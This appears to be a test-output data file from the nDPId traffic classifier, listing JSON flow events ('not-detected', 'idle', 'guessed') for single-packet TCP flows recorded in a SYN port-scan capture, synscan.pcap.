+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 